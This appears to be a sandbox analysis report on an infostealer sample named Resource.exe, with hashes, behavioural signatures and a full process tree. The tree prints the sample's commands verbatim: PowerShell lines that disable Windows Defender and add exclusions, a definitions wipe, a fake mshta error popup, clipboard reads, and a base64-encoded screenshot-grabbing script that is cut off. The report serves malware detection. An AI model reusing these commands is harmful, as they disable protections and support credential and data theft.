Resubmissions
07-01-2025 11:03
250107-m5s24azpgn 1006-01-2025 17:07
250106-vm4pwaskc1 1006-01-2025 17:03
250106-vkvdessjf1 10Analysis
-
max time kernel
85s -
max time network
84s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-01-2025 11:03
Behavioral task
behavioral1
Sample
Resource.exe
Resource
win10v2004-20241007-en
General
-
Target
Resource.exe
-
Size
7.4MB
-
MD5
cd56d1639c638ef44a1cbcf6756ef2ba
-
SHA1
784970f33b026fe770d8c0f8938d17b26c428327
-
SHA256
79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
-
SHA512
c00a3be6d4cbc672b4fe3b4afb5072832a870c99d795656380e23d33e9b7b45f2d0851ba86e1d35fe502af2d001cf13e13ff6d431349dc166cfbdcc54bb19b39
-
SSDEEP
196608:qw0cDemLjv+bhqNVoBKUh8mz4Iv9Pmu1D7wJo:SieaL+9qz8/b4IsuRmo
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3836 powershell.exe 3416 powershell.exe 948 powershell.exe 844 powershell.exe 5108 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Resource.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 808 cmd.exe 1232 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1764 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe 3728 Resource.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com 29 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 1868 tasklist.exe 1324 tasklist.exe 2160 tasklist.exe 2076 tasklist.exe 3148 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2368 cmd.exe -
resource yara_rule behavioral1/files/0x000a000000023b8f-21.dat upx behavioral1/memory/3728-25-0x00007FFD360A0000-0x00007FFD36689000-memory.dmp upx behavioral1/files/0x000a000000023b82-27.dat upx behavioral1/memory/3728-29-0x00007FFD45FC0000-0x00007FFD45FE3000-memory.dmp upx behavioral1/files/0x000a000000023b8d-31.dat upx behavioral1/files/0x000a000000023b8e-34.dat upx behavioral1/memory/3728-48-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp upx behavioral1/files/0x000a000000023b89-47.dat upx behavioral1/files/0x000a000000023b88-46.dat upx behavioral1/files/0x000a000000023b87-45.dat upx behavioral1/files/0x000a000000023b86-44.dat upx behavioral1/files/0x000a000000023b85-43.dat upx behavioral1/files/0x000a000000023b84-42.dat upx behavioral1/files/0x000a000000023b83-41.dat upx behavioral1/files/0x000a000000023b81-40.dat upx behavioral1/files/0x000b000000023b94-39.dat upx behavioral1/files/0x000b000000023b93-38.dat upx behavioral1/files/0x000b000000023b92-37.dat upx behavioral1/files/0x000a000000023b8c-33.dat upx behavioral1/memory/3728-54-0x00007FFD45E80000-0x00007FFD45EAD000-memory.dmp upx behavioral1/memory/3728-56-0x00007FFD4A690000-0x00007FFD4A6A9000-memory.dmp upx behavioral1/memory/3728-58-0x00007FFD45CD0000-0x00007FFD45CF3000-memory.dmp upx behavioral1/memory/3728-60-0x00007FFD35F20000-0x00007FFD36097000-memory.dmp upx behavioral1/memory/3728-64-0x00007FFD4A1A0000-0x00007FFD4A1AD000-memory.dmp upx behavioral1/memory/3728-62-0x00007FFD4A220000-0x00007FFD4A239000-memory.dmp upx behavioral1/memory/3728-66-0x00007FFD45BA0000-0x00007FFD45BD3000-memory.dmp upx behavioral1/memory/3728-71-0x00007FFD457E0000-0x00007FFD458AD000-memory.dmp upx behavioral1/memory/3728-74-0x00007FFD45FC0000-0x00007FFD45FE3000-memory.dmp upx behavioral1/memory/3728-73-0x00007FFD359F0000-0x00007FFD35F12000-memory.dmp upx behavioral1/memory/3728-70-0x00007FFD360A0000-0x00007FFD36689000-memory.dmp upx behavioral1/memory/3728-76-0x00007FFD45930000-0x00007FFD45944000-memory.dmp upx behavioral1/memory/3728-79-0x00007FFD45C70000-0x00007FFD45C7D000-memory.dmp upx behavioral1/memory/3728-78-0x00007FFD45E80000-0x00007FFD45EAD000-memory.dmp upx behavioral1/memory/3728-82-0x00007FFD354A0000-0x00007FFD355BC000-memory.dmp upx behavioral1/memory/3728-81-0x00007FFD4A690000-0x00007FFD4A6A9000-memory.dmp upx behavioral1/memory/3728-108-0x00007FFD45CD0000-0x00007FFD45CF3000-memory.dmp upx behavioral1/memory/3728-121-0x00007FFD35F20000-0x00007FFD36097000-memory.dmp upx behavioral1/memory/3728-176-0x00007FFD4A220000-0x00007FFD4A239000-memory.dmp upx behavioral1/memory/3728-249-0x00007FFD45BA0000-0x00007FFD45BD3000-memory.dmp upx behavioral1/memory/3728-251-0x00007FFD457E0000-0x00007FFD458AD000-memory.dmp upx behavioral1/memory/3728-267-0x00007FFD359F0000-0x00007FFD35F12000-memory.dmp upx behavioral1/memory/3728-295-0x00007FFD35F20000-0x00007FFD36097000-memory.dmp upx behavioral1/memory/3728-290-0x00007FFD45FC0000-0x00007FFD45FE3000-memory.dmp upx behavioral1/memory/3728-303-0x00007FFD354A0000-0x00007FFD355BC000-memory.dmp upx behavioral1/memory/3728-289-0x00007FFD360A0000-0x00007FFD36689000-memory.dmp upx behavioral1/memory/3728-304-0x00007FFD360A0000-0x00007FFD36689000-memory.dmp upx behavioral1/memory/3728-348-0x00007FFD354A0000-0x00007FFD355BC000-memory.dmp upx behavioral1/memory/3728-344-0x00007FFD457E0000-0x00007FFD458AD000-memory.dmp upx behavioral1/memory/3728-349-0x00007FFD359F0000-0x00007FFD35F12000-memory.dmp upx behavioral1/memory/3728-343-0x00007FFD45BA0000-0x00007FFD45BD3000-memory.dmp upx behavioral1/memory/3728-342-0x00007FFD4A1A0000-0x00007FFD4A1AD000-memory.dmp upx behavioral1/memory/3728-340-0x00007FFD35F20000-0x00007FFD36097000-memory.dmp upx behavioral1/memory/3728-339-0x00007FFD45CD0000-0x00007FFD45CF3000-memory.dmp upx behavioral1/memory/3728-338-0x00007FFD4A690000-0x00007FFD4A6A9000-memory.dmp upx behavioral1/memory/3728-337-0x00007FFD45E80000-0x00007FFD45EAD000-memory.dmp upx behavioral1/memory/3728-336-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp upx behavioral1/memory/3728-335-0x00007FFD45FC0000-0x00007FFD45FE3000-memory.dmp upx behavioral1/memory/3728-334-0x00007FFD360A0000-0x00007FFD36689000-memory.dmp upx behavioral1/memory/3728-347-0x00007FFD45C70000-0x00007FFD45C7D000-memory.dmp upx behavioral1/memory/3728-346-0x00007FFD45930000-0x00007FFD45944000-memory.dmp upx behavioral1/memory/3728-341-0x00007FFD4A220000-0x00007FFD4A239000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2236 cmd.exe 764 PING.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4596 WMIC.exe 4408 WMIC.exe 3556 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3312 systeminfo.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 5104 Notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 764 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4836 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 948 powershell.exe 948 powershell.exe 3416 powershell.exe 3416 powershell.exe 948 powershell.exe 3416 powershell.exe 3836 powershell.exe 3836 powershell.exe 1232 powershell.exe 1232 powershell.exe 1232 powershell.exe 316 powershell.exe 316 powershell.exe 316 powershell.exe 844 powershell.exe 844 powershell.exe 4168 powershell.exe 4168 powershell.exe 5108 powershell.exe 5108 powershell.exe 5108 powershell.exe 4412 powershell.exe 4412 powershell.exe 4412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2700 WMIC.exe Token: SeSecurityPrivilege 2700 WMIC.exe Token: SeTakeOwnershipPrivilege 2700 WMIC.exe Token: SeLoadDriverPrivilege 2700 WMIC.exe Token: SeSystemProfilePrivilege 2700 WMIC.exe Token: SeSystemtimePrivilege 2700 WMIC.exe Token: SeProfSingleProcessPrivilege 2700 WMIC.exe Token: SeIncBasePriorityPrivilege 2700 WMIC.exe Token: SeCreatePagefilePrivilege 2700 WMIC.exe Token: SeBackupPrivilege 2700 WMIC.exe Token: SeRestorePrivilege 2700 WMIC.exe Token: SeShutdownPrivilege 2700 WMIC.exe Token: SeDebugPrivilege 2700 WMIC.exe Token: SeSystemEnvironmentPrivilege 2700 WMIC.exe Token: SeRemoteShutdownPrivilege 2700 WMIC.exe Token: SeUndockPrivilege 2700 WMIC.exe Token: SeManageVolumePrivilege 2700 WMIC.exe Token: 33 2700 WMIC.exe Token: 34 2700 WMIC.exe Token: 35 2700 WMIC.exe Token: 36 2700 WMIC.exe Token: SeDebugPrivilege 3148 tasklist.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeIncreaseQuotaPrivilege 2700 WMIC.exe Token: SeSecurityPrivilege 2700 WMIC.exe Token: SeTakeOwnershipPrivilege 2700 WMIC.exe Token: SeLoadDriverPrivilege 2700 WMIC.exe Token: SeSystemProfilePrivilege 2700 WMIC.exe Token: SeSystemtimePrivilege 2700 WMIC.exe Token: SeProfSingleProcessPrivilege 2700 WMIC.exe Token: SeIncBasePriorityPrivilege 2700 WMIC.exe Token: SeCreatePagefilePrivilege 2700 WMIC.exe Token: SeBackupPrivilege 2700 WMIC.exe Token: SeRestorePrivilege 2700 WMIC.exe Token: SeShutdownPrivilege 2700 WMIC.exe Token: SeDebugPrivilege 2700 WMIC.exe Token: SeSystemEnvironmentPrivilege 2700 WMIC.exe Token: SeRemoteShutdownPrivilege 2700 WMIC.exe Token: SeUndockPrivilege 2700 WMIC.exe Token: SeManageVolumePrivilege 2700 WMIC.exe Token: 33 2700 WMIC.exe Token: 34 2700 WMIC.exe Token: 35 2700 WMIC.exe Token: 36 2700 WMIC.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 WMIC.exe Token: SeSecurityPrivilege 4596 WMIC.exe Token: SeTakeOwnershipPrivilege 4596 WMIC.exe Token: SeLoadDriverPrivilege 4596 WMIC.exe Token: SeSystemProfilePrivilege 4596 WMIC.exe Token: SeSystemtimePrivilege 4596 WMIC.exe Token: SeProfSingleProcessPrivilege 4596 WMIC.exe Token: SeIncBasePriorityPrivilege 4596 WMIC.exe Token: SeCreatePagefilePrivilege 4596 WMIC.exe Token: SeBackupPrivilege 4596 WMIC.exe Token: SeRestorePrivilege 4596 WMIC.exe Token: SeShutdownPrivilege 4596 WMIC.exe Token: SeDebugPrivilege 4596 WMIC.exe Token: SeSystemEnvironmentPrivilege 4596 WMIC.exe Token: SeRemoteShutdownPrivilege 4596 WMIC.exe Token: SeUndockPrivilege 4596 WMIC.exe Token: SeManageVolumePrivilege 4596 WMIC.exe Token: 33 4596 WMIC.exe Token: 34 4596 WMIC.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4836 POWERPNT.EXE 4836 POWERPNT.EXE 4836 POWERPNT.EXE 4836 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1184 wrote to memory of 3728 1184 Resource.exe 84 PID 1184 wrote to memory of 3728 1184 Resource.exe 84 PID 3728 wrote to memory of 2436 3728 Resource.exe 85 PID 3728 wrote to memory of 2436 3728 Resource.exe 85 PID 3728 wrote to memory of 4348 3728 Resource.exe 86 PID 3728 wrote to memory of 4348 3728 Resource.exe 86 PID 3728 wrote to memory of 4632 3728 Resource.exe 87 PID 3728 wrote to memory of 4632 3728 Resource.exe 87 PID 3728 wrote to memory of 3080 3728 Resource.exe 90 PID 3728 wrote to memory of 3080 3728 Resource.exe 90 PID 3728 wrote to memory of 3708 3728 Resource.exe 93 PID 3728 wrote to memory of 3708 3728 Resource.exe 93 PID 4632 wrote to memory of 4848 4632 cmd.exe 96 PID 4632 wrote to memory of 4848 4632 cmd.exe 96 PID 2436 wrote to memory of 3416 2436 cmd.exe 95 PID 2436 wrote to memory of 3416 2436 cmd.exe 95 PID 4348 wrote to memory of 948 4348 cmd.exe 97 PID 4348 wrote to memory of 948 4348 cmd.exe 97 PID 3080 wrote to memory of 3148 3080 cmd.exe 98 PID 3080 wrote to memory of 3148 3080 cmd.exe 98 PID 3708 wrote to memory of 2700 3708 cmd.exe 99 PID 3708 wrote to memory of 2700 3708 cmd.exe 99 PID 3728 wrote to memory of 3996 3728 Resource.exe 101 PID 3728 wrote to memory of 3996 3728 Resource.exe 101 PID 3996 wrote to memory of 4844 3996 cmd.exe 103 PID 3996 wrote to memory of 4844 3996 cmd.exe 103 PID 3728 wrote to memory of 2880 3728 Resource.exe 104 PID 3728 wrote to memory of 2880 3728 Resource.exe 104 PID 2880 wrote to memory of 1804 2880 cmd.exe 106 PID 2880 wrote to memory of 1804 2880 cmd.exe 106 PID 3728 wrote to memory of 3312 3728 Resource.exe 146 PID 3728 wrote to memory of 3312 3728 Resource.exe 146 PID 3312 wrote to memory of 4596 3312 cmd.exe 109 PID 3312 wrote to memory of 4596 3312 cmd.exe 109 PID 3728 wrote to memory of 2360 3728 Resource.exe 149 PID 3728 wrote to memory of 2360 3728 Resource.exe 149 PID 2360 wrote to memory of 4408 2360 cmd.exe 148 PID 2360 wrote to memory of 4408 2360 cmd.exe 148 PID 3728 wrote to memory of 2368 3728 Resource.exe 113 PID 3728 wrote to memory of 2368 3728 Resource.exe 113 PID 3728 wrote to memory of 1940 3728 Resource.exe 115 PID 3728 wrote to memory of 1940 3728 Resource.exe 115 PID 1940 wrote to memory of 3836 1940 cmd.exe 118 PID 1940 wrote to memory of 3836 1940 cmd.exe 118 PID 2368 wrote to memory of 2640 2368 cmd.exe 117 PID 2368 wrote to memory of 2640 2368 cmd.exe 117 PID 3728 wrote to memory of 4996 3728 Resource.exe 119 PID 3728 wrote to memory of 4996 3728 Resource.exe 119 PID 3728 wrote to memory of 3544 3728 Resource.exe 120 PID 3728 wrote to memory of 3544 3728 Resource.exe 120 PID 3544 wrote to memory of 1868 3544 cmd.exe 123 PID 3544 wrote to memory of 1868 3544 cmd.exe 123 PID 4996 wrote to memory of 1324 4996 cmd.exe 124 PID 4996 wrote to memory of 1324 4996 cmd.exe 124 PID 3728 wrote to memory of 808 3728 Resource.exe 126 PID 3728 wrote to memory of 808 3728 Resource.exe 126 PID 3728 wrote to memory of 2164 3728 Resource.exe 125 PID 3728 wrote to memory of 2164 3728 Resource.exe 125 PID 3728 wrote to memory of 2380 3728 Resource.exe 130 PID 3728 wrote to memory of 2380 3728 Resource.exe 130 PID 808 wrote to memory of 1232 808 cmd.exe 129 PID 808 wrote to memory of 1232 808 cmd.exe 129 PID 3728 wrote to memory of 3172 3728 Resource.exe 131 PID 3728 wrote to memory of 3172 3728 Resource.exe 131 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2640 attrib.exe 4776 attrib.exe 4936 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Resource.exe"C:\Users\Admin\AppData\Local\Temp\Resource.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\Resource.exe"C:\Users\Admin\AppData\Local\Temp\Resource.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Resource.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Resource.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"4⤵PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Resource.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Resource.exe"4⤵
- Views/modifies file attributes
PID:2640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2164
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2380
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3172
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:948
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1028
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:3800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIA